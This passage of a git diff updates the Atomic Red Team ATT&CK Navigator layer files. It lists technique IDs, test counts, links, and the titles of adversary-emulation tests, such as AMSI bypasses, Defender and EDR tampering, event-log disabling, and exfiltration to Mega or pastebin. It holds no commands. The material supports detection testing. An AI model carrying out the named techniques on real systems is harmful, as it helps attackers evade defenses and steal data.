Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":60,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":2,"enabled":true,"comment":"\n- Disable Windows Command Line Auditing using reg.exe\n- Disable Windows Command Line Auditing using Powershell Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n- Enumerate Windows Security Log via WevtUtil\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 35163a6d..5fd46d3a 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View 